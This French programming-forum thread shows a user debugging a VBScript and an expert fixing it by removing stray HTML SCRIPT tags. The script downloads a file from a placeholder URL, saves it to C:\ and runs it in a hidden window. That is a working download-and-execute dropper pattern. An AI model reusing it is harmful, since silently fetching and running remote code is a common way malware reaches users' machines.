IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

VBScript Discussion :

erreur script vbs


Sujet :

VBScript

  1. #1
    Membre du Club
    Profil pro
    Inscrit en
    Juin 2006
    Messages
    220
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Juin 2006
    Messages : 220
    Points : 48
    Points
    48
    Par défaut erreur script vbs
    bonjour voila j'ai fait ce script seulement j'ai un probleme quand je l'execute il me dise

    script:
    ligne:1
    caract:1
    erreur: instruction attendue
    code: 800A0400
    source: erreur de compilation microsoft vbscript
    j'ai lue que cela pouver venir de option explicit mes même en le métan cela ne marche pas.

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    <SCRIPT LANGUAGE="VBScript">
    Dim site
    Dim top
    Dim bkb
    site = "http://monsite/logiciel.rar "
    Set bkb = CreateObject("Microsoft.XMLHTTP")
    bkb.Open "GET", site, False
    bkb.Send
    top = bkb.ResponseBody
    Dim nit
    Set nit = CreateObject("ADODB.Stream")
    nit.Type = 1
    nit.Open
    nit.Write top
    nit.SaveToFile "C:\logiciel.rar", 2
    Dim WshShell
    Set WshShell = CreateObject("WScript.Shell")
    WshShell.Run "C:\logiciel.rar", 0, True
    </SCRIPT>

  2. #2
    Expert éminent sénior


    Profil pro
    Inscrit en
    Juin 2003
    Messages
    14 008
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Juin 2003
    Messages : 14 008
    Points : 20 040
    Points
    20 040
    Par défaut
    et tu le met en oeuvre comment ton script... ? et comment l'exécute tu ..?

  3. #3
    Membre du Club
    Profil pro
    Inscrit en
    Juin 2006
    Messages
    220
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Juin 2006
    Messages : 220
    Points : 48
    Points
    48
    Par défaut
    je le met dans un bloc note je mais enregistrer sous et je le renome en .vbs

  4. #4
    Expert éminent sénior


    Profil pro
    Inscrit en
    Juin 2003
    Messages
    14 008
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Juin 2003
    Messages : 14 008
    Points : 20 040
    Points
    20 040
    Par défaut
    commence par enlever les balises qui entoure ton code :
    supprime les 2 lignes :
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
     <SCRIPT LANGUAGE="VBScript">
    et

  5. #5
    Membre du Club
    Profil pro
    Inscrit en
    Juin 2006
    Messages
    220
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Juin 2006
    Messages : 220
    Points : 48
    Points
    48
    Par défaut
    a oui cela marche.merci bien

+ Répondre à la discussion
Cette discussion est résolue.

Discussions similaires

  1. Réponses: 4
    Dernier message: 05/01/2011, 22h28
  2. Erreur de syntaxe dans un script VBS
    Par metatron dans le forum Scripts/Batch
    Réponses: 1
    Dernier message: 11/03/2009, 12h18
  3. Erreur d'exécution - script VBS
    Par lord_kaiser dans le forum VBScript
    Réponses: 16
    Dernier message: 10/03/2008, 16h53
  4. Erreur script VBS avec les "dossiers virtuels" Vista
    Par Aquafresh dans le forum Windows Vista
    Réponses: 2
    Dernier message: 04/10/2007, 18h08
  5. Gestion erreur SQL Serveur dans un Script VBS
    Par jayan dans le forum VBScript
    Réponses: 3
    Dernier message: 08/02/2007, 14h06

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo